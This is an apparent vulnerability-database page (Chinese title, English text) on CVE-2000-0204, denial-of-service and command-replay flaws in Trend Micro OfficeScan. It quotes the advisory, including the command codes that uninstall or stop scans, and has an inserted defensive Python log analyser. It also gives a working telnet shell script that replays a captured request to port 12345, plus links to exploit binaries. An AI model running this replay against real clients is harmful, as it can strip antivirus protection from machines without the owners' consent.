Trend Micro OfficeScan远程拒绝服务攻击漏洞

Vulnerability ID: 1105725
Vulnerability Type: Other
Published: 2000-02-26
Updated: 2005-10-20
CVE ID: CVE-2000-0204
CNNVD ID: CNNVD-200002-082
Platform: Multiple
CVSS Score: 5.0
|Vulnerability Sources
https://www.exploit-db.com/exploits/19780
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200002-082
|Vulnerability Details
Trend Micro OfficeScan is a distributed anti-virus product from Trend Micro (USA). During installation the installer asks whether web-based management should be used. If web-based management is chosen, the OfficeScan client listens on 12345/TCP to receive periodic virus-database updates and commands from the OfficeScan management server.

A remote attacker has several ways to perform a denial of service against Trend Micro OfficeScan. Sending random data to 12345/TCP drives tmlisten.exe to 100% CPU usage and triggers a Visual C++ error, eventually crashing the machine. Sending random data to 12345/TCP while holding more than five TCP connections open to that port stops the service on that port from responding; the service must be restarted to recover.

A user on the same network segment can capture management commands with a sniffer, modify them and re-send them to clients. The last two bytes of these requests have the following meaning: 04: remotely uninstall the OfficeScan client; 06: start a scan; 07: stop a scan.

The OfficeScan client submits URL requests to the OfficeScan management server to obtain configuration information. If an attacker impersonates a valid OfficeScan management server, the client's scan policy can be changed, for example to scan only .txt files, to skip floppy and CD-ROM drives, or to move infected files to a different location.
|Vulnerability Exploit
source: http://www.securityfocus.com/bid/1013/info

Trend Micro OfficeScan is an antivirus software program which is deployable across an entire network. During the installation of the management software, the administrator is asked to choose between managing from a webserver or from a fileserver. If the webserver option is chosen, clients running OfficeScan are configured to listen to port 12345 in order to receive periodical database engine updates and other administrative commands from the OfficeScan manager. 

There are several ways for an attacker to cause various denial of service conditions.

Sending random data to port 12345 can cause tmlisten.exe to either consume 100% of the CPU cycles or cause a Visual C++ error and crash the machine.

Furthermore, opening over 5 simultaneous connections to port 12345 while sending random data will cause the service to stop responding to requests. The service will have to be stopped and restarted on each client machine.

It has also been reported that it is possible to cause a denial of service condition by making a single malformed GET request to port 12345.

It is also possible for a local user to capture an administrative command by using a network sniffer. This command can then be modified and replayed against other clients to cause them to perform a variety of actions. Modifying the last two bytes of the request will change the client's response behaviour, including:

04: full uninstallation of the OfficeScan client
06: launch a scan
07: stop a scan

The client makes requests to a few CGI programs on the server, which respond with configuration information. One of these CGIs is cgiRqCfg.exe, which provides configuration details for scan behaviour.

If an attacker were to set up a webserver with the same IP address as the valid server, duplicate the valid server's OfficeScan file structure, and disable the valid server, it would be possible to perform a more subtle DoS by leaving the client installed but modifying the config files to restrict the file types scanned (for example: setting the client to only scan .txt files) or to restrict the types of drives scanned (for example: disabling scanning on removable, fixed, and CD-ROM drives). It is also possible to cause the client to move any infected files to any location on the local machine.

It should also be noted that some intrusion detection systems may detect attacks against port 12345 as Back Orifice attempts, which has the potential to conceal the nature of these attacks.
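As an added defensive example (not part of the original advisory or of any Trend Micro tool), the following Python script applies the advisory's observations to constructed connection-log lines: it flags connections to 12345/TCP from any host other than the configured management server, counts simultaneous connections per source against the five-connection threshold, and reads the trailing command code of a client request so a replayed uninstall command stands out. The management server address, the log format, the sample lines and the treatment of the last two hex digits as the command code are assumptions.

```python
import re
from collections import defaultdict

# Constructed values for this example (assumptions, not taken from the advisory)
MGMT_SERVER = "10.0.0.5"   # only host that legitimately pushes commands to clients
OFFICESCAN_PORT = 12345    # tmlisten.exe listener described in the advisory
MAX_CONNS = 5              # advisory: more than 5 simultaneous connections hangs the service
COMMANDS = {"04": "uninstall client", "06": "launch scan", "07": "stop scan"}

# Assumed log format: "<ts> <src>:<sport> -> <dst>:<dport> OPEN|CLOSE [GET <path>]"
LOG_RE = re.compile(
    r"^(?P<ts>\S+) (?P<src>[\d.]+):(?P<sport>\d+) -> (?P<dst>[\d.]+):(?P<dport>\d+) "
    r"(?P<event>OPEN|CLOSE)(?: (?P<req>GET \S+))?$")

def classify_command(request):
    """Map the last two hex digits of a 'GET /?<hex>' request to the advisory's command codes."""
    m = re.match(r"GET /\?([0-9A-Fa-f]+)", request)
    if not m:
        return None
    return COMMANDS.get(m.group(1)[-2:].upper(), "unknown")

def analyze(lines):
    """Return (kind, src, ts) alerts for rogue sources, connection floods and replayed uninstalls."""
    alerts = []
    open_conns = defaultdict(set)  # src -> source ports currently open to port 12345
    for line in lines:
        m = LOG_RE.match(line)
        if not m or int(m["dport"]) != OFFICESCAN_PORT:
            continue
        src, ts = m["src"], m["ts"]
        if m["event"] == "CLOSE":
            open_conns[src].discard(m["sport"])
            continue
        open_conns[src].add(m["sport"])
        if src != MGMT_SERVER:
            alerts.append(("connection from non-management host", src, ts))
        if len(open_conns[src]) > MAX_CONNS:
            alerts.append(("connection flood against tmlisten", src, ts))
        if classify_command(m["req"] or "") == "uninstall client":
            alerts.append(("client uninstall command seen", src, ts))
    return alerts

# Constructed sample: one legitimate scan command, then a rogue host replaying an
# uninstall command and opening six more connections without sending a request.
SAMPLE = [
    "10:00:01 10.0.0.5:40001 -> 10.0.0.20:12345 OPEN GET /?AB06",
    "10:00:02 10.0.0.5:40001 -> 10.0.0.20:12345 CLOSE",
    "10:00:05 10.0.0.99:50001 -> 10.0.0.20:12345 OPEN GET /?AB04",
] + [f"10:00:{6 + i:02d} 10.0.0.99:{50002 + i} -> 10.0.0.20:12345 OPEN" for i in range(6)]
```

Running `analyze(SAMPLE)` yields seven non-management-host alerts, one uninstall alert and two flood alerts (the sixth and seventh open connections from the rogue host).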

cgiRqCfg.exe provides to the client configuration settings which will disable scanning on all removable, fixed, and CD-ROM drives, and further will disable scanning for all files except those with the extension "YES IT's P0SS1bl3!"

cgiOnStart.exe will need to be put on the attacking webserver as the client expects it.

https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/19780-1.exe

https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/19780-2.exe

This script will replay the request to the client, and may be launched from any machine. Modify for your installation and desired client response.

#!/bin/sh
# Replays a captured OfficeScan management request to the client given as $1.
# The hex string is the captured request from the original advisory, sent as
# an HTTP/1.0 GET to the client's tmlisten.exe listener on 12345/TCP.
(
sleep 2
echo "GET /?05680F545E88AED5392B885EE7142D8BBF8E352693725430DC1E7F954FB345FE899F01203B222CFAF8B05CA5D90CF5DEE738102AB1CAEEE62F7F4AA36ECD20CB5EADEC2C54776650D555A9415BE5348E7F00F981A5DBEE1F3AB30FABC433230F66B49982FDA5F077D07AF721CD7918A5580C331BC4C2A959BF634112B4F9A93953B8F64B02C881ED6C55BFCD62056134BBF8007EFFB66435181A7762EE02B8913F545D2511897C898F3E53BB8D4F4EC71E7FAC6D8E26D3E55A9A7C1EB96BDFD2BE844FC5EC65DAF6C71C02942A92BB978AC8751202C50EE40445DD6CD11CE11A9906 HTTP/1.0"
echo "Host: $1:12345"
echo "User-Agent: OfficeScan/3.5"
echo "Accept: */*"
echo
echo
sleep 5
) | telnet "$1" 12345 2>&1 | tee -a ./log.txt

Trend Micro Officescan Denial of Service (tmosdos.zip) was contributed by Marc Ruef <[email protected]>. This tool is a pre-compiled Windows binary with Visual Basic source.

https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/19780-3.zip
|References

Source: BUGTRAQ
Name: 20000315 Trend Micro release patch for "OfficeScan DoS & Message Replay" Vulnerabilities
Link: http://www.securityfocus.com/templates/archive.pike?list=1&msg=D129BBE1730AD2118A0300805FC1C2FE038AF28B@209-76-212-10.trendmicro.com
Source: BID
Name: 1013
Link: http://www.securityfocus.com/bid/1013
Source: BUGTRAQ
Name: 20000226 DOS in Trendmicro OfficeScan
Link: http://archives.neohapsis.com/archives/bugtraq/2000-02/0340.html
Source: www.antivirus.com
Link: http://www.antivirus.com/download/ofce_patch_35.htm
Source: NSFOCUS
Name: 347
Link: http://www.nsfocus.net/vulndb/347
